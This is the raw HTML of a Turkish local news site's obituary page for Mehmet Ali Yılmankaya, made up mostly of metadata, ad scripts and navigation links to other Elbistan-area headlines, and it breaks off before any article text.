
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Mehmet Ali Yılmankaya 79 yaşında</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Mehmet Ali Yılmankaya 79 yaşında"> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Mehmet Ali Yılmankaya 79 yaşında"> <meta property="og:description" content="Mehmet Ali Yılmankaya 79 yaşında"> <meta property="og:url" content="http://www.elbistaninsesi.com/vefatlar/mehmet-ali-yilmankaya-79-yasinda-h63233.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2019/06/mehmet_ali_yilmankaya_79_yasinda_h63233_525e4.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Mehmet Ali Yılmankaya 79 yaşında"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/vefatlar/mehmet-ali-yilmankaya-79-yasinda-h63233.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Mehmet Ali Yılmankaya 79 yaşında"> <meta name="twitter:description" content="Mehmet Ali Yılmankaya 79 yaşında"> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2019/06/mehmet_ali_yilmankaya_79_yasinda_h63233_525e4.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2019/06/mehmet_ali_yilmankaya_79_yasinda_h63233_525e4.jpg" /> <meta itemprop="headline" content="Mehmet Ali Yılmankaya 79 yaşında" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mehmet_ali_yilmankaya_79_yasinda_h63233_525e4.jpg" /> <meta itemprop="articleSection" content="Vefatlar" name="section" /> <meta itemprop="dateCreated" content="2019-06-09T13:49:14+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2019/06/mehmet_ali_yilmankaya_79_yasinda_h63233_525e4.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate"></span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate"></span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate"></span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate"></span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/komur-sahasinda-gocuk-1-isci-hayatini-kaybetti-h60703.html" title="Kömür sahasında göçük: 1 işçi hayatını kaybetti" >Kömür sahasında göçük: 1 işçi hayatını kaybetti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/unal-stk-temsilcileri-ile-sahurda-bulustu-h57204.html" title="Ünal STK temsilcileri ile sahurda buluştu" >Ünal STK temsilcileri ile sahurda buluştu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/arslan-kudus-sahipsiz-degildir-h57124.html" title="Arslan: “Kudüs sahipsiz değildir”" >Arslan: “Kudüs sahipsiz değildir”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/oztunc-24-haziranda-elbistanda-sandiklari-patlatacagiz-h56762.html" title="Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”" >Öztunç: “24 Haziran’da Elbistan’da sandıkları patlatacağız”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/vefatlar/aziz-temur-anma-h55750.html" title="Aziz Temur Anma" >Aziz Temur Anma</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/kahramanmaras-kivisi-tezgahlardaki-yerini-aldi-h49076.html" title="Kahramanmaraş kivisi tezgahlardaki yerini aldı" >Kahramanmaraş kivisi tezgahlardaki yerini aldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/politika/ak-partili-debgici-yeniden-aday-h49075.html" title="AK Parti’li Debgici yeniden aday" >AK Parti’li Debgici yeniden aday</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/haberde-insan/kadinlarin-kislik-yufka-ekmek-telasi-h49074.html" title="Kadınların kışlık yufka ekmek telaşı" >Kadınların kışlık yufka ekmek telaşı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/asayis/keci-otlatirken-kayaliklardan-dustu-h48619.html" title="Keçi otlatırken kayalıklardan düştü" >Keçi otlatırken kayalıklardan düştü</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/egitim/dulkadiroglundan-egitime-destek-h48618.html" title="Dulkadiroğlu’ndan eğitime destek" >Dulkadiroğlu’ndan eğitime destek</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="bc80a0724107478a7dd85f9b9bae65ff6deaf29f" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Mehmet Ali Yılmankaya 79 yaşında" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" class="current" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/ergun-yilmankaya-29-yasinda-h63235.html" title="Ergün Yılmankaya 29 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/ergun_yilmankaya_29_yasinda_h63235_42be8.jpg" alt="Ergün Yılmankaya 29 yaşında" /> Ergün Yılmankaya 29 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/ayse-fatma-yilmankaya-69-yasinda-h63234.html" title="Ayşe Fatma Yılmankaya 69 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/ayse_fatma_yilmankaya_69_yasinda_h63234_7b8c1.jpg" alt="Ayşe Fatma Yılmankaya 69 yaşında" /> Ayşe Fatma Yılmankaya 69 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-ali-yilmankaya-79-yasinda-h63233.html" title="Mehmet Ali Yılmankaya 79 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mehmet_ali_yilmankaya_79_yasinda_h63233_525e4.jpg" alt="Mehmet Ali Yılmankaya 79 yaşında" /> Mehmet Ali Yılmankaya 79 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/bilal-guven-62-yasinda-h63226.html" title="Bilal Güven, 62 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/bilal_guven_62_yasinda_h63226_f1797.jpg" alt="Bilal Güven, 62 yaşında" /> Bilal Güven, 62 yaşında</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/yan-yana-defnedildiler-h63232.html" title="Yan yana defnedildiler"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/yan_yana_defnedildiler_h63232_dfcfe.JPG" alt="Yan yana defnedildiler" /> Yan yana defnedildiler</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/serik-kahramanmaraslilar-derneginden-ziyaret-h63231.html" title="Serik Kahramanmaraşlılar Derneği’nden ziyaret"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/serik_kahramanmaraslilar_derneginden_ziyaret_h63231_14c24.jpg" alt="Serik Kahramanmaraşlılar Derneği’nden ziyaret" /> Serik Kahramanmaraşlılar Derneği’nden ziyaret</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/papatyam-anaokulundan-ulke-capinda-ozel-basari-h63230.html" title="Papatyam Anaokulu’ndan ülke çapında özel başarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/papatyam_anaokulundan_ulke_capinda_ozel_basari_h63230_18bc4.jpg" alt="Papatyam Anaokulu’ndan ülke çapında özel başarı" /> Papatyam Anaokulu’ndan ülke çapında özel başarı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/dogandan-avcilara-avlanma-pulu-hatirlatmasi-h63229.html" title="Doğan’dan avcılara avlanma pulu hatırlatması"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/dogandan_avcilara_avlanma_pulu_hatirlatmasi_h63229_7535c.jpg" alt="Doğan’dan avcılara avlanma pulu hatırlatması" /> Doğan’dan avcılara avlanma pulu hatırlatması</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-eker-mazbatasini-aldi-h62471.html" title="Başkan Eker, mazbatasını aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/baskan_eker_mazbatasini_aldi_h62471_6d495.JPG" alt="Başkan Eker, mazbatasını aldı" /> Başkan Eker, mazbatasını aldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunctan-gungore-hayirli-olsun-ziyareti-h62469.html" title="Öztunç’tan Güngör’e hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/oztunctan_gungore_hayirli_olsun_ziyareti_h62469_f4649.jpg" alt="Öztunç’tan Güngör’e hayırlı olsun ziyareti" /> Öztunç’tan Güngör’e hayırlı olsun ziyareti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iste-partilerin-oy-dagilimi-h62445.html" title="İşte partilerin oy dağılımı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/iste_partilerin_oy_dagilimi_h62445_7a2a4.JPG" alt="İşte partilerin oy dağılımı" /> İşte partilerin oy dağılımı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edhde-cerrahi-onkoloji-ve-gastroenteroloji-uzmani-goreve-basliyor-h62241.html" title="EDH’de cerrahi onkoloji ve gastroenteroloji uzmanı göreve başlıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/03/edhde_cerrahi_onkoloji_ve_gastroenteroloji_uzmani_goreve_basliyor_h62241_68d70.JPG" alt="EDH’de cerrahi onkoloji ve gastroenteroloji uzmanı göreve başlıyor" /> EDH’de cerrahi onkoloji ve gastroenteroloji uzmanı göreve başlıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistana-8-uzman-hekim-1-eczaci-ve-2-de-dis-hekimi-atanacak-h62040.html" title="Elbistan’a 8 uzman hekim, 1 eczacı ve 2 de diş hekimi atanacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/02/elbistana_8_uzman_hekim_1_eczaci_ve_2_de_dis_hekimi_atanacak_h62040_f8870.JPG" alt="Elbistan’a 8 uzman hekim, 1 eczacı ve 2 de diş hekimi atanacak" /> Elbistan’a 8 uzman hekim, 1 eczacı ve 2 de diş hekimi atanacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistan-devlet-hastanesi-buyumeye-devam-ediyor-h61761.html" title="Elbistan Devlet Hastanesi büyümeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/elbistan_devlet_hastanesi_buyumeye_devam_ediyor_h61761_6abf5.jpg" alt="Elbistan Devlet Hastanesi büyümeye devam ediyor" /> Elbistan Devlet Hastanesi büyümeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistana-noroloji-uzmani-atandi-h61676.html" title="Elbistan’a Nöroloji Uzmanı atandı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/elbistana_noroloji_uzmani_atandi_h61676_e46d7.jpg" alt="Elbistan’a Nöroloji Uzmanı atandı" /> Elbistan’a Nöroloji Uzmanı atandı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/basarili-hafizlik-ogrencilerine-belge-verildi-h61690.html" title="Başarılı hafızlık öğrencilerine belge verildi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/basarili_hafizlik_ogrencilerine_belge_verildi_h61690_1ce2f.jpg" alt="Başarılı hafızlık öğrencilerine belge verildi" /> Başarılı hafızlık öğrencilerine belge verildi</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/nergele-ve-gozpinar-futbol-takimlari-sinirda-dostluk-maci-yapacak-h62968.html" title="Nergele ve Gözpınar futbol takımları sınırda dostluk maçı yapacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/05/nergele_ve_gozpinar_futbol_takimlari_sinirda_dostluk_maci_yapacak_h62968_ee117.jpg" alt="Nergele ve Gözpınar futbol takımları sınırda dostluk maçı yapacak" /> Nergele ve Gözpınar futbol takımları sınırda dostluk maçı yapacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-balda-kaldi-h62748.html" title="Elbistanspor, BAL’da kaldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/elbistanspor_balda_kaldi_h62748_d2a0d.jpg" alt="Elbistanspor, BAL’da kaldı" /> Elbistanspor, BAL’da kaldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-sezonun-son-macindan-3-0-yenik-ayrildi-h62685.html" title="Elbistanspor, sezonun son maçından 3-0 yenik ayrıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/elbistanspor_sezonun_son_macindan_3_0_yenik_ayrildi_h62685_c2a95.jpg" alt="Elbistanspor, sezonun son maçından 3-0 yenik ayrıldı" /> Elbistanspor, sezonun son maçından 3-0 yenik ayrıldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-lig-ikincisini-eli-bos-gonderdi-h62524.html" title="Elbistanspor, lig ikincisini eli boş gönderdi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/elbistanspor_lig_ikincisini_eli_bos_gonderdi_h62524_c4e75.JPG" alt="Elbistanspor, lig ikincisini eli boş gönderdi" /> Elbistanspor, lig ikincisini eli boş gönderdi</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/tedavi-sureclerinde-meslek-sahibi-olacaklar-h60414.html" title="Tedavi süreçlerinde meslek sahibi olacaklar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/10/tedavi_sureclerinde_meslek_sahibi_olacaklar_h60414_dbbab.JPG" alt="Tedavi süreçlerinde meslek sahibi olacaklar" /> Tedavi süreçlerinde meslek sahibi olacaklar</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/vergi-dairesi-yapilandirma-icin-hafta-sonu-acik-olacak-h58716.html" title="Vergi dairesi, yapılandırma için hafta sonu açık olacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/07/vergi_dairesi_yapilandirma_icin_hafta_sonu_acik_olacak_h58716_87ab1.jpg" alt="Vergi dairesi, yapılandırma için hafta sonu açık olacak" /> Vergi dairesi, yapılandırma için hafta sonu açık olacak</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistan-ciftcisi-sulamada-gunesi-kesfetti-h63227.html" title="Elbistan çiftçisi, sulamada güneşi keşfetti" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2019/06/site_baYlYk_2_1.jpg" alt="Elbistan çiftçisi, sulamada güneşi keşfetti" class="pull-left" /> <div class="caption-line"><p>Elbistan çiftçisi, sulamada güneşi keşfetti</p></div> </a> </li> <li 